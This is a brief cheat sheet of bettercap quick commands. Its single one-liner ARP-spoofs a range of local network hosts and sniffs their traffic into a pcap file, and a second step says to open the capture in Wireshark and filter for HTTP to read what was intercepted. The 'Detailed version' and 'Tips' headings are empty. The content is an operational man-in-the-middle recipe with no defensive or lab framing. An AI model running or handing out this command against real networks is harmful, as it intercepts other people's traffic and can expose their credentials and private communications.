Bettercap Quick Commands

Beware: Commands might be outdated

One liner

Note: Make sure to edit output file <DATE>and list of IP Addresses X.X.X.1-253 to spoof

  1. Run bettercap
        ./bettercap -iface eth0 -eval "set net.sniff.filter not arp and not udp dst port 53 and not udp dst port 5353;set net.sniff.output arp.spoof.<DATE>.cap;net.sniff on;set arp.spoof.targets X.X.X.1-253;arp.spoof on"
    
  2. Open pcap in wireshark and input “http” on the filter box

Detailed version


Tips